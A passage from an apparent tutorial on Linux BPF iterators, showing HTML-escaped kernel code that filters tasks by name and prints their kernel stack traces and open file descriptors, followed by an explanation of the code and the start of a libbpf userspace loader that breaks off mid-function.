    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;match&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Get kernel stack trace for this task */&lt;/span&gt;
    &lt;span class="n"&gt;retlen&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_get_task_stack&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                    &lt;span class="n"&gt;MAX_STACK_TRACE_DEPTH&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;SIZE_OF_ULONG&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;retlen&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;stacks_shown&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="cm"&gt;/* Print task info and stack trace */&lt;/span&gt;
    &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"=== Task: %s (pid=%u, tgid=%u) ===&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"Stack depth: %u frames&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;retlen&lt;/span&gt; &lt;span class="o"&gt;/&lt;/span&gt; &lt;span class="n"&gt;SIZE_OF_ULONG&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;MAX_STACK_TRACE_DEPTH&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;retlen&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="n"&gt;SIZE_OF_ULONG&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"  [%2ld] %pB&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;entries&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="cm"&gt;/* Task file descriptor iterator */&lt;/span&gt;
&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"iter/task_file"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;dump_task_file&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_iter__task_file&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;seq_file&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;meta&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;task_struct&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;||&lt;/span&gt; &lt;span class="n"&gt;file&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;files_shown&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;meta&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;seq_num&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;=== Summary: %u file descriptors shown ===&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                       &lt;span class="n"&gt;files_shown&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="cm"&gt;/* Filter by task name if specified */&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="n"&gt;target_comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sc"&gt;'\0'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="n"&gt;match&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;match&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;meta&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;seq_num&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%-16s %8s %8s %6s %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
                   &lt;span class="s"&gt;"COMM"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"TGID"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"PID"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"FD"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"FILE_OPS"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;

    &lt;span class="n"&gt;files_shown&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;BPF_SEQ_PRINTF&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;seq&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s"&gt;"%-16s %8d %8d %6d 0x%lx&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;tgid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;task&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
               &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;long&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;f_op&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the BPF Code
&lt;/h3&gt;

&lt;p&gt;The program implements two separate iterators that share the same filtering logic. The &lt;code&gt;SEC("iter/task")&lt;/code&gt; annotation registers &lt;code&gt;dump_task_stack&lt;/code&gt; as a task iterator: the kernel calls this function once for each task in the system, then once more with a NULL task to mark the end of iteration. The context structure &lt;code&gt;bpf_iter__task&lt;/code&gt; provides two fields: &lt;code&gt;meta&lt;/code&gt;, which carries iteration metadata and the seq_file used for output, and &lt;code&gt;task&lt;/code&gt;, which points to the current task_struct and is NULL on that final call so you can print summaries.&lt;/p&gt;

&lt;p&gt;The task stack iterator shows in-kernel filtering in action. When &lt;code&gt;task&lt;/code&gt; is NULL, we've reached the end of iteration and print a summary of how many task stacks were shown. For every other call, we first compare &lt;code&gt;task-&amp;gt;comm&lt;/code&gt; (the process name) against &lt;code&gt;target_comm&lt;/code&gt;. Standard library functions like &lt;code&gt;strcmp()&lt;/code&gt; aren't available in BPF, so we loop over the 16-byte name buffer and compare byte by byte; the names match only if they are identical up to and including the terminating NUL. If filtering is enabled and the names don't match, we return 0 immediately with no output, so the task is skipped entirely in the kernel and never reaches userspace.&lt;/p&gt;

&lt;p&gt;Once a task passes filtering, we extract its kernel stack trace using &lt;code&gt;bpf_get_task_stack()&lt;/code&gt;. This BPF helper captures up to 64 stack frames into our &lt;code&gt;entries&lt;/code&gt; array and returns the number of bytes written, or a negative error code, in which case we skip the task. Dividing the byte count by &lt;code&gt;SIZE_OF_ULONG&lt;/code&gt; gives the number of frames. We format the output using &lt;code&gt;BPF_SEQ_PRINTF()&lt;/code&gt;, which writes to the kernel's seq_file infrastructure. The special &lt;code&gt;%pB&lt;/code&gt; format specifier symbolizes kernel addresses, turning raw pointers into human-readable function names like &lt;code&gt;schedule+0x42/0x100&lt;/code&gt;, so the stack traces are immediately useful for debugging.&lt;/p&gt;

&lt;p&gt;The file descriptor iterator demonstrates a different iterator type. &lt;code&gt;SEC("iter/task_file")&lt;/code&gt; tells the kernel to call this function for every open file descriptor across all tasks. The context provides &lt;code&gt;task&lt;/code&gt;, &lt;code&gt;file&lt;/code&gt; (the kernel's struct file pointer), and &lt;code&gt;fd&lt;/code&gt; (the numeric file descriptor). We apply the same task name filtering, then format the output as a table. Checking &lt;code&gt;ctx-&amp;gt;meta-&amp;gt;seq_num == 0&lt;/code&gt; identifies the first element of the iteration, so the column headers are printed at most once. Because this check runs after the name filter, the headers appear only when that first element belongs to a matching task.&lt;/p&gt;

&lt;p&gt;Notice how filtering happens before any expensive operations. We check the task name first, and only if it matches do we extract stack traces or format file information. This keeps the per-task cost low: non-matching tasks are rejected with just a string comparison, with no stack capture, no formatting, and no output.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete User-Space Program: task_stack.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Userspace program for task stack and file iterator */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;stdio.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;unistd.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;string.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/libbpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"task_stack.skel.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;libbpf_print_fn&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;libbpf_print_level&lt;/span&gt; &lt;span class="n"&gt;level&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kt"&gt;va_list&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="n"&gt;vfprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;stderr&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;args&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;static&lt;/span&gt; &lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="nf"&gt;run_iterator&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;const&lt;/span&gt; &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_program&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;bpf_link&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;link&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;iter_fd&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;len&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;8192&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

    &lt;span class="n"&gt;link&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_program__attach_iter&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;prog&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
